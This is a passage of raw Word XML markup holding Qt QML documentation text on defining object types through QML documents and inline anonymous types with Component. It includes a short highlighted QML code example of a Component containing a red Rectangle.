    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thus, if a QML document named "MyButton.qml" exists, it provides the definition of the "MyButton" type, which may be used in a QML application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId147" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for information on how to define a QML document, </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the syntax of the QML language.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you are familiar with the QML language and how to define QML documents, see the documentation which explains how to</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>define and use your own reusable QML types in QML documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId149" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Object Types through QML Documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00297A80">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="defining-anonymous-types-with-component"/>
      <w:bookmarkStart w:id="221" w:name="_Toc483000579"/>
      <w:bookmarkStart w:id="222" w:name="_Toc483003600"/>
      <w:bookmarkStart w:id="223" w:name="_Toc483603931"/>
      <w:bookmarkStart w:id="224" w:name="_Toc483605151"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Anonymous Types with Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Another method of creating object types from within QML is to use the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. This allows a </w:t>
      </w:r>
      <w:r w:rsidRPr="002749C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type to be defined inline</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a QML document, instead of using a separate document in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> height</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">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906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">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906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        id</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 xml:space="preserve"> myComponent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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 xml:space="preserve"> width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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 xml:space="preserve"> height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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 xml:space="preserve"> color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">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906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
